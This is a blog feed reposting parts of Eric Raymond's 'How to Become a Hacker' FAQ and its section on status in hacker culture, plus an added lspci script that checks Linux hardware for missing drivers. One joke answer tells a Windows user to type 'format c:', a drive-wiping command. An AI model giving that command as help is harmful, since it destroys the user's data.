<p><span style="" lang="EN">When you release software or write patches for software, try to follow the guidelines in the <a href="http://en.tldp.org/HOWTO/Software-Release-Practice-HOWTO/index.html" target="_top">Software Release Practice HOWTO</a>.</span><span style=""><o:p></o:p></span></p>
<p><span style="" lang="EN">If you enjoyed the Zen poem, you might also like <a href="http://catb.org/%7Eesr/writings/unix-koans" target="_top">Rootless Root: The Unix Koans of Master Foo</a>.</span><span style=""><o:p></o:p></span></p>
<p><b>Frequently Asked Questions</b></p>
<p>Q: Which are the best hacking tools?</p>
<p>A: <a href="http://www.google.com">Google</a>, <a href="http://www.wikipedia.org">Wiki</a> and your brain.</p>
<table class="MsoNormalTable" style="" border="0" cellpadding="0">
<tbody>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">How do I tell if I am already a   hacker?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Ask yourself the following three   questions:<o:p></o:p></span></p>
<p><span style="">· Do you speak code, fluently?<o:p></o:p></span></p>
<p><span style="">· Do you identify with the goals   and values of the hacker community?<o:p></o:p></span></p>
<p><span style="">· Has a well-established member of   the hacker community ever called you a hacker?<o:p></o:p></span></p>
<p><span style="">If you can answer yes to <i>all   three</i> of these questions, you are already a hacker. No two alone are   sufficient.<o:p></o:p></span></p>
<p><span style="">The first test is about skills.   You probably pass it if you have the minimum technical skills described   earlier in this document. You blow right through it if you have had a   substantial amount of code accepted by an open-source development project.<o:p></o:p></span></p>
<p><span style="">The second test is about attitude.   If the <a href="http://www.catb.org/%7Eesr/faqs/hacker-howto.html#attitude" title="The Hacker Attitude">five principles of the hacker mindset</a> seemed   obvious to you, more like a description of the way you already live than   anything novel, you are already halfway to passing it. That&#8217;s the inward   half; the other, outward half is the degree to which you identify with the   hacker community&#8217;s long-term projects.<o:p></o:p></span></p>
<p><span style="">Here is an incomplete but   indicative list of some of those projects: Does it matter to you that Linux   improve and spread? Are you passionate about software freedom? Hostile to monopolies?   Do you act on the belief that computers can be instruments of empowerment   that make the world a richer and more humane place?<o:p></o:p></span></p>
<p><span style="">But a note of caution is in order   here. The hacker community has some specific, primarily defensive political   interests — two of them are defending free-speech rights and fending off   &#8220;intellectual-property&#8221; power grabs that would make open source   illegal. Some of those long-term projects are civil-liberties organizations   like the Electronic Frontier Foundation, and the outward attitude properly   includes support of them. But beyond that, most hackers view attempts to   systematize the hacker attitude into an explicit political program with   suspicion; we&#8217;ve learned, the hard way, that these attempts are divisive and   distracting. If someone tries to recruit you to march on your capitol in the   name of the hacker attitude, they&#8217;ve missed the point. The right response is   probably “Shut up and show them the code.”<o:p></o:p></span></p>
<p><span style="">The third test has a tricky   element of recursiveness about it. I observed in <a href="http://www.catb.org/%7Eesr/faqs/hacker-howto.html#what_is" title="What Is a Hacker?">the section called “What Is a Hacker?”</a> that   being a hacker is partly a matter of belonging to a particular subculture or   social network with a shared history, an inside and an outside. In the far   past, hackers were a much less cohesive and self-aware group than they are   today. But the importance of the social-network aspect has increased over the   last thirty years as the Internet has made connections with the core of the   hacker subculture easier to develop and maintain. One easy behavioral index   of the change is that, in this century, we have our own T-shirts.<o:p></o:p></span></p>
<p><span style="">Sociologists, who study networks   like those of the hacker culture under the general rubric of &#8220;invisible   colleges&#8221;, have noted that one characteristic of such networks is that   they have gatekeepers — core members with the social authority to endorse new   members into the network. Because the &#8220;invisible college&#8221; that is   hacker culture is a loose and informal one, the role of gatekeeper is   informal too. But one thing that all hackers understand in their bones is   that not every hacker is a gatekeeper. Gatekeepers have to have a certain   degree of seniority and accomplishment before they can bestow the title. How   much is hard to quantify, but every hacker knows it when they see it.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Will you teach me how to hack?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Since first publishing this page,   I&#8217;ve gotten several requests a week (often several a day) from people to   &#8220;teach me all about hacking&#8221;. Unfortunately, I don&#8217;t have the time   or energy to do this; my own hacking projects, and working as an open-source   advocate, take up 110% of my time.<o:p></o:p></span></p>
<p><span style="">Even if I did, hacking is an   attitude and skill you basically have to teach yourself. You&#8217;ll find that   while real hackers want to help you, they won&#8217;t respect you if you beg to be   spoon-fed everything they know.<o:p></o:p></span></p>
<p><span style="">Learn a few things first. Show   that you&#8217;re trying, that you&#8217;re capable of learning on your own. Then go to   the hackers you meet with specific questions.<o:p></o:p></span></p>
<p><span style="">If you do email a hacker asking   for advice, here are two things to know up front. First, we&#8217;ve found that   people who are lazy or careless in their writing are usually too lazy and   careless in their thinking to make good hackers — so take care to spell   correctly, and use good grammar and punctuation, otherwise you&#8217;ll probably be   ignored. Secondly, don&#8217;t <i>dare</i> ask for a reply to an ISP account that&#8217;s   different from the account you&#8217;re sending from; we find people who do that   are usually thieves using stolen accounts, and we have no interest in   rewarding or assisting thievery.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">How can I get started, then?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">The best way for you to get   started would probably be to go to a LUG (Linux user group) meeting. You can   find such groups on the <a href="http://www.tldp.org/links/index.html" target="_top">LDP General Linux Information Page</a>; there is probably one   near you, possibly associated with a college or university. LUG members will   probably give you a Linux if you ask, and will certainly help you install one   and get started.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">When do you have to start? Is it   too late for me to learn?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Any age at which you are motivated   to start is a good age. Most people seem to get interested between ages 15   and 20, but I know of exceptions in both directions.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">How long will it take me to learn   to hack?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">That depends on how talented you   are and how hard you work at it. Most people who try can acquire a respectable   skill set in eighteen months to two years, if they concentrate. Don&#8217;t think   it ends there, though; in hacking (as in many other fields) it takes about   ten years to achieve mastery. And if you are a real hacker, you will spend   the rest of your life learning and perfecting your craft.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Is Visual Basic a good language to   start with?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">If you&#8217;re asking this question, it   almost certainly means you&#8217;re thinking about trying to hack under Microsoft   Windows. This is a bad idea in itself. When I compared trying to learn to   hack under Windows to trying to learn to dance while wearing a body cast, I   wasn&#8217;t kidding. Don&#8217;t go there. It&#8217;s ugly, and it never stops being ugly.<o:p></o:p></span></p>
<p><span style="">There is a specific problem with   Visual Basic; mainly that it&#8217;s not portable. Though there is a prototype   open-source implementations of Visual Basic, the applicable ECMA standards   don&#8217;t cover more than a small set of its programming interfaces. On Windows   most of its library support is proprietary to a single vendor (Microsoft); if   you aren&#8217;t <i>extremely</i> careful about which features you use — more   careful than any newbie is really capable of being — you&#8217;ll end up locked   into only those platforms Microsoft chooses to support. If you&#8217;re starting on   a Unix, much better languages with better libraries are available. Python,   for example.<o:p></o:p></span></p>
<p><span style="">Also, like other Basics, Visual   Basic is a poorly-designed language that will teach you bad programming   habits. No, <i>don&#8217;t</i> ask me to describe them in detail; that explanation   would fill a book. Learn a well-designed language instead.<o:p></o:p></span></p>
<p><span style="">One of those bad habits is   becoming dependent on a single vendor&#8217;s libraries, widgets, and development   tools. In general, any language that isn&#8217;t fully supported under at least   Linux or one of the BSDs, and/or at least three different vendors&#8217; operating   systems, is a poor one to learn to hack in.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Would you help me to crack a   system, or teach me how to crack?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">No. Anyone who can still ask such   a question after reading this FAQ is too stupid to be educable even if I had   the time for tutoring. Any emailed requests of this kind that I get will be   ignored or answered with extreme rudeness.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">How can I get the password for   someone else&#8217;s account?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">This is cracking. Go away, idiot.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">How can I break into/read/monitor   someone else&#8217;s email?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">This is cracking. Get lost, moron.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">How can I steal channel op   privileges on IRC?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">This is cracking. Begone, cretin.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">I&#8217;ve been cracked. Will you help   me fend off further attacks?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">No. Every time I&#8217;ve been asked   this question so far, it&#8217;s been from some poor sap running Microsoft Windows.   It is not possible to effectively secure Windows systems against crack attacks;   the code and architecture simply have too many flaws, which makes securing   Windows like trying to bail out a boat with a sieve. The only reliable   prevention starts with switching to Linux or some other operating system that   is designed to at least be capable of security.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">I&#8217;m having problems with my   Windows software. Will you help me?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Yes. Go to a DOS prompt and type   &#8220;format c:&#8221;. Any problems you are experiencing will cease within a   few minutes.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Where can I find some real hackers   to talk with?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">The best way is to find a Unix or   Linux user&#8217;s group local to you and go to their meetings (you can find links   to several lists of user groups on the <a href="http://www.tldp.org/" target="_top">LDP</a> site at ibiblio).<o:p></o:p></span></p>
<p><span style="">(I used to say here that you   wouldn&#8217;t find any real hackers on IRC, but I&#8217;m given to understand this is   changing. Apparently some real hacker communities, attached to things like   GIMP and Perl, have IRC channels now.)</span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Can you recommend useful books   about hacking-related subjects?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">I maintain a <a style="border-bottom-style: groove;" href="http://en.tldp.org/HOWTO/Reading-List-HOWTO/index.html" target="_top">Linux   Reading List HOWTO</a> that you may find helpful. The <a style="border-bottom-style: groove;" href="http://www.catb.org/%7Eesr/faqs/loginataka.html" target="_top">Loginataka</a>   may also be interesting.<o:p></o:p></span></p>
<p><span style="">For an introduction to Python, see   the <a href="http://www.python.org/doc/Intros.html" target="_top">introductory   materials</a> on the Python site.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Do I need to be good at math to   become a hacker?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">No. Hacking uses very little   formal mathematics or arithmetic. In particular, you won&#8217;t usually need   trigonometry, calculus or analysis (there are exceptions to this in a handful   of specific application areas like 3-D computer graphics). Knowing some   formal logic and Boolean algebra is good. Some grounding in finite   mathematics (including finite-set theory, combinatorics, and graph theory)   can be helpful.<o:p></o:p></span></p>
<p><span style="">Much more importantly: you need to   be able to think logically and follow chains of exact reasoning, the way   mathematicians do. While the content of most mathematics won&#8217;t help you, you   will need the discipline and intelligence to handle mathematics. If you lack   the intelligence, there is little hope for you as a hacker; if you lack the   discipline, you&#8217;d better grow it.<o:p></o:p></span></p>
<p><span style="">I think a good way to find out if   you have what it takes is to pick up a copy of Raymond Smullyan&#8217;s book <i>What   Is The Name Of This Book?</i>. Smullyan&#8217;s playful logical conundrums are very   much in the hacker spirit. Being able to solve them is a good sign; <i>enjoying</i>   solving them is an even better one.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">What language should I learn first?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">XHTML (the latest dialect of HTML)   if you don&#8217;t already know it. There are a lot of glossy, hype-intensive <i>bad</i>   HTML books out there, and distressingly few good ones. The one I like best is   <a href="http://www.oreilly.com/catalog/html5/" target="_top"><i>HTML: The   Definitive Guide</i></a>.<o:p></o:p></span></p>
<p><span style="">But HTML is not a full programming   language. When you&#8217;re ready to start programming, I would recommend starting   with <a href="http://www.python.org/" target="_top">Python</a>. You will hear   a lot of people recommending Perl, and Perl is still more popular than   Python, but it&#8217;s harder to learn and (in my opinion) less well designed.<o:p></o:p></span></p>
<p><span style="">C is really important, but it&#8217;s   also much more difficult than either Python or Perl. Don&#8217;t try to learn it   first.<o:p></o:p></span></p>
<p><span style="">Windows users, do <i>not</i>   settle for Visual Basic. It will teach you bad habits, and it&#8217;s not portable   off Windows. Avoid.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">What kind of hardware do I need?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">It used to be that personal   computers were rather underpowered and memory-poor, enough so that they   placed artificial limits on a hacker&#8217;s learning process. This stopped being   true in the mid-1990s; any machine from an Intel 486DX50 up is more than   powerful enough for development work, X, and Internet communications, and the   smallest disks you can buy today are plenty big enough.<o:p></o:p></span></p>
<p><span style="">The important thing in choosing a   machine on which to learn is whether its hardware is Linux-compatible (or   BSD-compatible, should you choose to go that route). Again, this will be true   for almost all modern machines. The only really sticky areas are modems and   wireless cards; some machines have Windows-specific hardware that won&#8217;t work   with Linux.<o:p></o:p></span></p>
<p><span style="">There&#8217;s a FAQ on hardware   compatibility; the latest version is <a href="http://en.tldp.org/HOWTO/Hardware-HOWTO/index.html" target="_top">here</a>.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">I want to contribute. Can you help   me pick a problem to work on?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">No, because I don&#8217;t know your   talents or interests. You have to be self-motivated or you won&#8217;t stick, which   is why having other people choose your direction almost never works.<o:p></o:p></span></p>
<p><span style="">Try this. Watch the project   announcements scroll by on <a href="http://freshmeat.net/" target="_top">Freshmeat</a>   for a few days. When you see one that makes you think &#8220;Cool! I&#8217;d like to   work on that!&#8221;, join it.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Q:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">Do I need to hate and bash   Microsoft?<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p><span style="">A:<o:p></o:p></span></p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p><span style="">No, you don&#8217;t. Not that Microsoft   isn&#8217;t loathsome, but there was a hacker culture long before Microsoft and   there will still be one long after Microsoft is history. Any energy you spend   hating Microsoft would be better spent on loving your craft. Write good code   — that will bash Microsoft quite sufficiently without polluting your karma.<o:p></o:p></span></p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p>Q:</p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p>But won&#8217;t open-source software leave programmers unable to make a living?</p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p>A:</p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p>This seems unlikely — so far, the open-source software industry seems to be creating jobs rather than taking them away. If having a program written is a net economic gain over not having it written, a programmer will get paid whether or not the program is going to be open-source after it&#8217;s done. And, no matter how much &#8220;free&#8221; software gets written, there always seems to be more demand for new and customized applications. I&#8217;ve written more about this at the <a style="border-bottom-style: groove;" href="http://www.opensource.org/" target="_top">Open Source</a> pages.</p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p>Q:</p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p>Where can I get a free Unix?</p>
</td>
</tr>
<tr style="">
<td style="padding: 0.75pt;" valign="top">
<p>A:</p>
</td>
<td style="padding: 0.75pt;" valign="top">
<p>If you don&#8217;t have a Unix installed on your machine yet, elsewhere on this page I include pointers to where to get the most commonly used free Unix. To be a hacker you need motivation and initiative and the ability to educate yourself. Start now&#8230;</p>
</td>
</tr>
</tbody>
</table>
<p><b>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-thread ends&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</b></p>
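<p>A practical way to run the hardware-compatibility check the FAQ above talks about, once a Linux system is booted (for instance from a live CD), is to list the PCI devices and look for any that no kernel driver has bound to. The script below is an added example; it is not part of ESR's HOWTO or of this blog. It assumes a Linux machine with the pciutils package (<code>lspci</code>) installed, and the sample <code>lspci -k</code> output embedded in it is constructed for illustration, not captured from a real machine.</p>

```sh
#!/bin/sh
# Added example (not from the original article): report PCI devices that
# have no kernel driver bound, using the output format of `lspci -k`
# (pciutils). Wireless cards and modems are the usual offenders.

# Read `lspci -k` output on stdin; print the header line of every device
# that has no "Kernel driver in use:" line underneath it.
undriven_devices() {
    awk '
        # A device block starts with a PCI bus address such as 02:00.0;
        # the detail lines below it are indented, so they never match.
        /^[0-9a-f]+:[0-9a-f]+\.[0-9a-f]/ {
            if (dev != "" && !driven) print dev
            dev = $0
            driven = 0
            next
        }
        /Kernel driver in use:/ { driven = 1 }
        END { if (dev != "" && !driven) print dev }
    '
}

# Run the check against this machine. Requires lspci; root is not needed,
# although without it some subsystem names may be missing.
check_local_hardware() {
    lspci -k | undriven_devices
}

# Constructed sample in `lspci -k` format (vendor and device names are
# placeholders): three devices, one of them a wireless controller whose
# module exists but never bound, which is typical of missing firmware or
# a blacklisted driver.
SAMPLE_LSPCI='00:1f.2 SATA controller: Example Vendor AHCI Controller
	Subsystem: Example OEM Device 0001
	Kernel driver in use: ahci
	Kernel modules: ahci
02:00.0 Network controller: Example Vendor Wireless Adapter
	Subsystem: Example OEM Device 0002
	Kernel modules: example_wl
03:00.0 Ethernet controller: Example Vendor Gigabit Ethernet
	Subsystem: Example OEM Device 0003
	Kernel driver in use: example_eth
	Kernel modules: example_eth'

# Demonstration on the constructed sample: only the wireless adapter is printed.
printf '%s\n' "$SAMPLE_LSPCI" | undriven_devices
```

<p>Reading the result: a device that shows a <code>Kernel modules:</code> line but no <code>Kernel driver in use:</code> line has a driver on the system that failed to bind, which on Linux is more often missing firmware (look for firmware load errors in <code>dmesg</code>) than a truly unsupported card. A device with neither line is the case the FAQ warns about: no in-tree driver knows the hardware. Run <code>check_local_hardware</code> on the real machine to see the live list.</p>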
<p><b><a href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-1.html">chapter-1</a><br /><a href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-2.html">chapter-2</a><br /><a href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-3.html">chapter-3</a><br /><a href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-4.html">chapter-4</a></b></p>
<p>source: Article written by Sir ESR</p>
<p></span></p>
]]></content:encoded>
			<wfw:commentRss>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-4/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>How to become a hacker-ch 3</title>
		<link>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-3/</link>
		<comments>http://ankitkumaragarwal.com/how-to-become-a-hacker-ch-3/#comments</comments>
		<pubDate>Thu, 20 Nov 2008 19:21:00 +0000</pubDate>
		<dc:creator>Ankit Kumar Agarwal</dc:creator>
				<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[info]]></category>

		<guid isPermaLink="false">http://ankitkumaragarwal.com/?p=22</guid>
		<description><![CDATA[Chapter-3
  
Table of Contents

Status in the Hacker Culture
1. Write open-source software
2. Help test and debug open-source software
3. Publish useful information
4. Help keep the infrastructure working
5. Serve the hacker culture itself
Like most cultures without a money economy, hackerdom runs on reputation. You&#8217;re trying to solve interesting problems, but how interesting they are, and whether your [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-weight: bold; font-style: italic; color: rgb(255, 255, 255);">Chapter-3</span>
<p class="MsoNormal"><b>Table of Contents</b></p>
<p class="MsoNormal"><b>Status in the Hacker Culture</b></p>
<p>1. Write open-source software</p>
<p>2. Help test and debug open-source software</p>
<p>3. Publish useful information</p>
<p>4. Help keep the infrastructure working</p>
<p>5. Serve the hacker culture itself</p>
<p class="MsoNormal">Like most cultures without a money economy, hackerdom runs on reputation. You&#8217;re trying to solve interesting problems, but how interesting they are, and whether your solutions are really good, is something that only your technical peers or superiors are normally equipped to judge.</p>
<p class="MsoNormal">Accordingly, when you play the hacker game, you learn to keep score primarily by what other hackers think of your skill (this is why you aren&#8217;t really a hacker until other hackers consistently call you one). This fact is obscured by the image of hacking as solitary work; also by a hacker-cultural taboo (gradually decaying since the late 1990s but still potent) against admitting that ego or external validation are involved in one&#8217;s motivation at all.</p>
<p> <span class="fullpost">
<p class="MsoNormal">Specifically, hackerdom is what anthropologists call a <i>gift culture</i>. You gain status and reputation in it not by dominating other people, nor by being beautiful, nor by having things other people want, but rather by giving things away. Specifically, by giving away your time, your creativity, and the results of your skill.</p>
<p class="MsoNormal">There are basically five kinds of things you can do to be respected by hackers:</p>
<p class="MsoNormal"><a name="_1._Write_open-source_software"></a><b>1. Write open-source software</b></p>
<p class="MsoNormal">The first (the most central and most traditional) is to write programs that other hackers think are fun or useful, and give the program sources away to the whole hacker culture to use.</p>
<p class="MsoNormal">(We used to call these works “free software”, but this confused too many people who weren&#8217;t sure exactly what “free” was supposed to mean. Most of us now prefer the term “<a href="http://www.opensource.org/" target="_top">open-source</a>” software).</p>
<p class="MsoNormal">Hackerdom&#8217;s most revered demigods are people who have written large, capable programs that met a widespread need and given them away, so that now everyone uses them.</p>
<p class="MsoNormal">But there&#8217;s a bit of a fine historical point here. While hackers have always looked up to the open-source developers among them as our community&#8217;s hardest core, before the mid-1990s most hackers most of the time worked on closed source. This was still true when I wrote the first version of this HOWTO in 1996; it took the mainstreaming of open-source software after 1997 to change things. Today, &#8220;the hacker community&#8221; and &#8220;open-source developers&#8221; are two descriptions for what is essentially the same culture and population — but it is worth remembering that this was not always so.</p>
<p class="MsoNormal"><a name="_2._Help_test_and debug open-source "></a><b>2. Help test and debug open-source software</b></p>
<p class="MsoNormal">They also serve who stand and debug open-source software. In this imperfect world, we will inevitably spend most of our software development time in the debugging phase. That&#8217;s why any open-source author who&#8217;s thinking will tell you that good beta-testers (who know how to describe symptoms clearly, localize problems well, can tolerate bugs in a quickie release, and are willing to apply a few simple diagnostic routines) are worth their weight in rubies. Even one of these can make the difference between a debugging phase that&#8217;s a protracted, exhausting nightmare and one that&#8217;s merely a salutary nuisance.</p>
<p class="MsoNormal">If you&#8217;re a newbie, try to find a program under development that you&#8217;re interested in and be a good beta-tester. There&#8217;s a natural progression from helping test programs to helping debug them to helping modify them. You&#8217;ll learn a lot this way, and generate good karma with people who will help you later on.</p>
<p class="MsoNormal"><a name="_3._Publish_useful_information"></a><b>3. Publish useful information</b></p>
<p class="MsoNormal">Another good thing is to collect and filter useful and interesting information into web pages or documents like Frequently Asked Questions (FAQ) lists, and make those generally available.</p>
<p class="MsoNormal">Maintainers of major technical FAQs get almost as much respect as open-source authors.</p>
<p class="MsoNormal"><a name="_4._Help_keep_the infrastructure wor"></a><b>4. Help keep the infrastructure working</b></p>
<p class="MsoNormal">The hacker culture (and the engineering development of the Internet, for that matter) is run by volunteers. There&#8217;s a lot of necessary but unglamorous work that needs done to keep it going — administering mailing lists, moderating newsgroups, maintaining large software archive sites, developing RFCs and other technical standards.</p>
<p class="MsoNormal">People who do this sort of thing well get a lot of respect, because everybody knows these jobs are huge time sinks and not as much fun as playing with code. Doing them shows dedication.</p>
<p class="MsoNormal"><a name="_5._Serve_the_hacker culture itself"></a><b>5. Serve the hacker culture itself</b></p>
<p class="MsoNormal">Finally, you can serve and propagate the culture itself (by, for example, writing an accurate primer on how to become a hacker <img src='http://ankitkumaragarwal.com/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> ). This is not something you&#8217;ll be positioned to do until you&#8217;ve been around for a while and become well-known for one of the first four things.</p>
<p class="MsoNormal">The hacker culture doesn&#8217;t have leaders, exactly, but it does have culture heroes and tribal elders and historians and spokespeople. When you&#8217;ve been in the trenches long enough, you may grow into one of these. Beware: hackers distrust blatant ego in their tribal elders, so visibly reaching for this kind of fame is dangerous. Rather than striving for it, you have to sort of position yourself so it drops in your lap, and then be modest and gracious about your status.</p>
<p class="MsoNormal"><span class="fullpost"><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-1.html">chapter-1</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-2.html">chapter-2</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-3.html">chapter-3</a><br /><a style="border-bottom-style: groove;" href="http://ankitunleashed.blogspot.com/2008/11/how-to-become-hacker-ch-4.html">chapter-4</a></p>
<p>source: Article written by Sir ESR</span></p>
<p></span></p>
]]></content:encoded>
